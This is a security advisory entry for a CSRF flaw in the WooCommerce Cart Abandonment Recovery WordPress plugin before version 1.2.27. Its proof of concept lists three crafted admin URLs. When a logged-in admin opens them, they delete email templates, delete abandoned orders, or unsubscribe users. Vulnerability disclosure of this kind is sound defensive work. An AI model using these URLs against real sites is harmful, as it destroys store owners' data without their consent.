WooCommerce Cart Abandonment Recovery < 1.2.27 - Templates/Abandoned Orders Deletion via CSRF

2024-03-1300:00:00

Erwan LR (WPScan)

wordpress

woocommerce

csrf

security vulnerability

unauthorized access

6.9 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.1%

JSON

Description The plugin does not have CSRF check in its bulk actions, which could allow attackers to make logged in admins delete arbitrary email templates as well as delete and unsubscribe users from abandoned orders via CSRF attacks.

Make a logged in admin open one of the URLs below

- To make them delete the Email Template with ID 1:
https://example.com/wp-admin/admin.php?page=woo-cart-abandonment-recovery&action=email_tmpl&action2=email_tmpl&sub_action=delete_bulk_email_tmpl&id[]=1

- To make them delete the abandoned order with ID 1:
https://example.com/wp-admin/admin.php?page=woo-cart-abandonment-recovery&action=delete&action2=delete&id=1

- To make them unsubscribe the user from the abandon order with ID 1:
https://example.com/wp-admin/admin.php?page=woo-cart-abandonment-recovery&action=unsubscribe&action2=unsubscribe&id=1